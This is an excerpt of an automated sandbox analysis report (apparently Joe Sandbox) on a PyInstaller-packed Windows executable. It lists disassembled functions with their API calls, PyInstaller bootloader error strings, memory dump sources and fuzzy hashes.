Function 00007FF7691B832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B835E

Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7691ABEC5), ref: 00007FF7691B837C

Strings

C:\Users\user\Desktop\VaTlw2kNGc.exe, xrefs: 00007FF7691B836A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\VaTlw2kNGc.exe
API String ID: 3976345311-3782499776
Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction ID: 8ec0a577db9cf52c414b7e13bce90e6b4b47b3d0aa1467e576bbd5d2d877450a
Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction Fuzzy Hash: 05416036A08B52C6E719FF25F4911BCB3B6EB45B94FA54035EA4E43B99DE3CD4418320

Function 00007FF7691BF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BF916

Part of subcall function 00007FF7691BE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE908

Strings

:, xrefs: 00007FF7691BF956
., xrefs: 00007FF7691BF967

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction ID: b54f97da19a92e2e943bc31fb2dd757af3d90c5cbf48a949b5ab0268f2b09081
Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction Fuzzy Hash: 38416026F08752D8FB14FFB1A8501BC6675AF14758FA40039EE5D67B8DDF38A4469320

Function 00007FF7691BBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7691BC05F
GetLastError.KERNEL32 ref: 00007FF7691BC081

Strings

U, xrefs: 00007FF7691BC00B

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: c3cd2968c8eb6ef4574f38d2bf459be36a180e7b9a29f56cbc44d6714322a635
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: 7A41A422B18A85C5EB24AF25F4443AAB771FB98794FA44035EE4D87B98DF3CD441CB50

Function 00007FF7691BE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE95A

Strings

:, xrefs: 00007FF7691BE91E

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction ID: 5dc2ea9728abb61aef2ae4b63c10a72cfd873f7b20e709e1f2465431cfeb90c0
Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction Fuzzy Hash: 3B21B622B08681C1EB68AF15E04427DF3B2FB84B84FE54135D68D43688DF7CDA49CBA1

Function 00007FF7691AF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7691AF0B8
RaiseException.KERNEL32 ref: 00007FF7691AF0F9

Strings

csm, xrefs: 00007FF7691AF0E6

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 94ce0bdcc1f81004d8b6861d16c18a4ddd6435a2bb7dcabd40a7b74d59a568f4
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 30114936618B84C2EB659F25F540269B7E5FB88B84FA84230DA8D07B68DF3CD951CB00

Function 00007FF7691BFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF7691BFABC

Strings

:, xrefs: 00007FF7691BFAA5

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: fb77c04894fd7e2f1205b4b6178695d2e6e481c56ab2a1d07d4e951f78faeb66
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: CB01DB26A0C246C6FB2CBF60B46137EA3B0EF48708FE40036D55D82799DE3CE504CA20

Analysis Process: VaTlw2kNGc.exePID: 6520, Parent PID: 6920COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	674
Total number of Limit Nodes:	15

Executed Functions

Function 00007FF7691A1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7691A36FC
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF7691A3A12
Failed to convert DLL search path!, xrefs: 00007FF7691A38A3
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF7691A3A31
Could not create temporary directory!, xrefs: 00007FF7691A3838
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7691A37EF
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7691A3905
pkg, xrefs: 00007FF7691A37CF
pyi-contents-directory, xrefs: 00007FF7691A35F8
pyi-disable-windowed-traceback, xrefs: 00007FF7691A361D
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7691A3653
_MEIPASS2, xrefs: 00007FF7691A36A2, 00007FF7691A36AE, 00007FF7691A39AC
pyi-runtime-tmpdir, xrefs: 00007FF7691A35D3
Failed to start splash screen!, xrefs: 00007FF7691A3933
MEI, xrefs: 00007FF7691A374E
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7691A378C
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7691A3820
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7691A391A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: c5d5e495bd61fe344249f7605fb933625fa15eb8c761ae1beab3e43f7f417bc2
Instruction ID: bde7d7aa7b3e13d47e0e1640368fcfe0862a14d4bc14e43a798d12d16ef09090
Opcode Fuzzy Hash: c5d5e495bd61fe344249f7605fb933625fa15eb8c761ae1beab3e43f7f417bc2
Instruction Fuzzy Hash: 2EF15C21B08682D1FA1DFF21B5543B9E271AF54790FE44432DA5D83AD6EF2CE95AC320

Function 00007FF7691C5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C59E9
Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5A67
Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5AB8

CreateFileW.KERNELBASE ref: 00007FF7691C5D7A
CreateFileW.KERNEL32 ref: 00007FF7691C5DCA
GetLastError.KERNEL32 ref: 00007FF7691C5DFA
GetFileType.KERNELBASE ref: 00007FF7691C5E0F
GetLastError.KERNEL32 ref: 00007FF7691C5E19
CloseHandle.KERNEL32 ref: 00007FF7691C5E4C
CloseHandle.KERNEL32 ref: 00007FF7691C5FAF
CreateFileW.KERNEL32 ref: 00007FF7691C5FE4
GetLastError.KERNEL32 ref: 00007FF7691C5FF3

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: af3ee9bd4c262c801d871cd97e80b7e2da0c3bc77c77e1909c4ccdb5f8225516
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: D9C1C132B28A45C6EB18EF68E4802BC7771FB49B98B610225DA2E977D5CF3CD051C710

Function 00007FF7691A85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7691A85D3
FindClose.KERNELBASE ref: 00007FF7691A85E2

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 28785ceea2b0b0f30b8a138418f6573cebbaab0393ddc1dbf0bfad79a0c637e8
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: B8F0C832A18681C7F7649F60B449366B3B0AB44338F944335D96E02AD4CF3CD459CA00

Function 00007FF7691A18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691A76A0: _fread_nolock.LIBCMT ref: 00007FF7691A774A

_fread_nolock.LIBCMT ref: 00007FF7691A19B4

Part of subcall function 00007FF7691A2760: MessageBoxW.USER32 ref: 00007FF7691A283B

Strings

Failed to seek to cookie position!, xrefs: 00007FF7691A1989
Could not allocate memory for archive structure!, xrefs: 00007FF7691A19EE
malloc, xrefs: 00007FF7691A1AA8
fread, xrefs: 00007FF7691A19C6, 00007FF7691A1ADB
Could not allocate buffer for TOC!, xrefs: 00007FF7691A1AA1
Error on file., xrefs: 00007FF7691A1B0A
fseek, xrefs: 00007FF7691A1990
Failed to read cookie!, xrefs: 00007FF7691A19BF
MEI, xrefs: 00007FF7691A1931
calloc, xrefs: 00007FF7691A19F5
Could not read full TOC!, xrefs: 00007FF7691A1AD4

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: f66987a484dbaa53c5a926167477fdbe970f3f776ab65a7504d21796d5ee8852
Instruction ID: 6e817fb7fd7a4d2593f2607697d9b8ea0804b25ccb16239f813aec2121c207b8
Opcode Fuzzy Hash: f66987a484dbaa53c5a926167477fdbe970f3f776ab65a7504d21796d5ee8852
Instruction Fuzzy Hash: A5719371A18686C9EB28EF15F4502B9A3B1FB44784FE44035D98D87B99EE2CE945CB20

Function 00007FF7691A1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A14A9
malloc, xrefs: 00007FF7691A14E0
fread, xrefs: 00007FF7691A15A1
fseek, xrefs: 00007FF7691A14B0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A146F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7691A14D9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A159A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: dcac176b47ad8788345011f3d6c0bf7ad26d14789bd120509890e862367161fe
Instruction ID: 3795d5a3172879acb87a804f979797337d372a63ce1e00726d208c8a7d4166f7
Opcode Fuzzy Hash: dcac176b47ad8788345011f3d6c0bf7ad26d14789bd120509890e862367161fe
Instruction Fuzzy Hash: 7D416E21B08642C1EA28BF26B8405BAE3B0FF45BD4FE44432DE5E57E95EE3CE9418710

Function 00007FF7691A11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7691A13EE
1.3.1, xrefs: 00007FF7691A1229
malloc, xrefs: 00007FF7691A129C, 00007FF7691A12CA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7691A1256
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7691A1295
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7691A12C3

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 7cbe84d2c41071a976958ab209a82948c2858f1d448497253cedd7a1cd3329ad
Instruction ID: afbe93d9745f3c213c613500cf7cb2aee57ed989e43ba1029df23616921d1b8e
Opcode Fuzzy Hash: 7cbe84d2c41071a976958ab209a82948c2858f1d448497253cedd7a1cd3329ad
Instruction Fuzzy Hash: B751E462A08642C1E669BF16B8503BAA2A1BF457A4FE44135ED4D47FD5EF3CE901C720

Function 00007FF7691BE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE19C
GetProcAddress.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE1A8

Strings

ext-ms-, xrefs: 00007FF7691BE0F9
api-ms-, xrefs: 00007FF7691BE0E6

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: 06273b36a89951c0c3bee4e0ab3ca8dae2d5714d0e4321fdd823760d49318c3a
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: D041A221B19A02C1EB19EF16B800675A3B6BF45BA0FB84135DD1E97788EE3CE505C7A0

Function 00007FF7691BAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BB199

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction ID: fdff0f622d5cce48fc36476010f4086c5bf72174902ca68bb17410ab2a2f49db
Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction Fuzzy Hash: 4FC1E862A0C687D1E769BF15B4802BDB7B2EB90B90FB54131DA5E03B99CE7CE445C320

Function 00007FF7691A33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7691A3534), ref: 00007FF7691A3411

Part of subcall function 00007FF7691A29E0: GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
Part of subcall function 00007FF7691A29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
Part of subcall function 00007FF7691A29E0: MessageBoxW.USER32 ref: 00007FF7691A2ACF

Strings

Failed to obtain executable path., xrefs: 00007FF7691A341B
GetModuleFileNameW, xrefs: 00007FF7691A3422
Failed to resolve full path to executable %ls., xrefs: 00007FF7691A3461
Failed to convert executable path to UTF-8., xrefs: 00007FF7691A34B8
\\?\, xrefs: 00007FF7691A3482

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
